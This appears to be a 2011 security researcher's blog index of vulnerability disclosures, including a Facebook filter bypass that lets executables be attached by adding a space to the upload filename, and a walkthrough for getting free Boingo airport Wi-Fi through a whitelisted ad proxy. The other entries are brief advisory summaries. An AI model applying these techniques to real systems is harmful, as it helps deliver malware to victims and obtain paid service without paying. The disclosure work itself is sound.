October 27, 2011

Facebook Attach EXE Vulnerability















----------------------------------------------------------------------------------------------------------------------------------------
1. Summary:

When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered to subvert this security mechanisms. Note, you do NOT have to be friends with the user to send them a message with an attachment.

----------------------------------------------------------------------------------------------------------------------------------------
2. Description:

When attaching an executable file, Facebook will return an error message stating:

"Error Uploading: You cannot attach files of that type."









When uploading a file attachment to Facebook we captured the web browsers POST request being sent to the web server. Inside this POST request reads the line:

Content-Disposition: form-data; name="attachment"; filename="cmd.exe"

It was discovered the variable 'filename' was being parsed to determine if the file type is allowed or not.

To subvert the security mechanisms to allow an .exe file type, we modified the POST request by appending a space to our filename variable like so:

filename="cmd.exe "



































This was enough to trick the parser and allow our executable file to be attached and sent in a
message.










----------------------------------------------------------------------------------------------------------------------------------------
3. Impact:

Potentially allow an attacker to compromise a victim’s computer system.

----------------------------------------------------------------------------------------------------------------------------------------
4. Affected Products:

www.facebook.com

----------------------------------------------------------------------------------------------------------------------------------------
5. Time Table:

09/30/2011 Reported Vulnerability to the Vendor
10/26/2011 Vendor Acknowledged Vulnerability
10/27/2011 Publicly Disclosed
11/01/2011 Vulnerability Fixed

----------------------------------------------------------------------------------------------------------------------------------------
6. Credits:

Discovered by Nathan Power
www.securitypentest.com

----------------------------------------------------------------------------------------------------------------------------------------

July 23, 2011

DEFCON Travelers.. Don't just go. Boingo (for free)


While recently traveling, I noticed several airports I visited had a hotspot named "boingo".  Boingo claims to be a worldwide leader in Wi-Fi services. They basically provide wireless internet access for a fee. In this article I'm going to discuss the steps I took to avoid paying a fee for Boingo internet access.

The "boingo" hotspot is "open" and anyone can connect to it. When I connected to it, I received a dhcp lease. I launch my web browser and when I attempted to go to google.com, I got redirected to a boingo web page suggesting I pay money to use the internet.

I had noticed the boingo web page seemed to have quite a bit functionality to it. One thing in particular that I noticed was the advertisements. When I looked up the source of an ad, I noticed the ad was pointing to the advertiser's server over the internet. I started going through the source code of the web page and discovered the following URL was being used to redirect advertisers requests through the network via a proxy.

http://ads.jiwire.com/JOS.aspx?http/h71028.www7.hp.com/enterprise/us/en/ipg/business-printing-solutions.html?jumpid=ex_r2548_go/printingandimaging

If I could use this proxy to get to google.com, this would solve all my problems. Yet things aren't always that easy.. I entered http://ads.jiwire.com/JOS.aspx?http/www.google.com/ into my browser and I got an error stating that this domain was not in the "white list".



Now that I know the system is using a white list, it is just a matter of brute forcing domains to find which domains are allowed.

Below are a list of domains I found by manually brute forcing:
  • mobileproxy.org
  • www.att.com
  • www.bing.com
  • www.blockbuster.com
  • www.chrysler.com
  • www.dell.com
  • www.ford.com
  • www.hp.com
  • www.htc.com
  • www.itunes.com
  • www.java.com
  • www.netflix.com
  • www.oracle.com
  • www.t-mobile.com
  • www.skype.com
  • www.sprint.com
  • www.wordpress.com
To my shock, a proxy service such as mobileproxy.org was in the white list. You can see below, by using mobileproxy.org to redirect my traffic through the ads.jiwire.com proxy.. I was able to reach google.com!

A white list system is never a perfect security solution, it just filters content and in this case we were able to abuse that. If we weren't able to access the mobileproxy.org service that redirect our requests, there is always the potential of URL redirect type issues with in any of the advertisers domains.  It would just be a matter of finding them. Enjoy!

June 1, 2011

Multi-Tech Systems XSS POC

Multi-Tech Systems "MultiModem iSMS" Multiple XSS Vulnerabilities



1. Summary:


Multi-Tech Systems "MultiModem iSMS" appliance is affected by multiple XSS (cross-site scripting) vulnerabilities.  The product was designed to give low bandwidth applications the ability to send information by reliable, affordable SMS text messages.




April 25, 2011

Trustwave WebDefend Privilege Escalation Vulnerability








1. Summary:

A privilege escalation vulnerability has been identified in Trustwave's WebDefend Enterprise product.  It is possible for the restricted operator account to gain access as root on the appliance.



WebDefend Privilege Escalation POC

March 25, 2011

Unidesk ReportingService Forceful Browsing Vulnerability



1. Summary:

Unidesk management appliance is prone to a forceful browsing vulnerability that allows an attacker access to administrator resources.



February 27, 2011

Facebook URL Redirect Vulnerability












1. Summary:

Once the victim clicks on a specially crafted Facebook URL they can be redirected to a malicious website.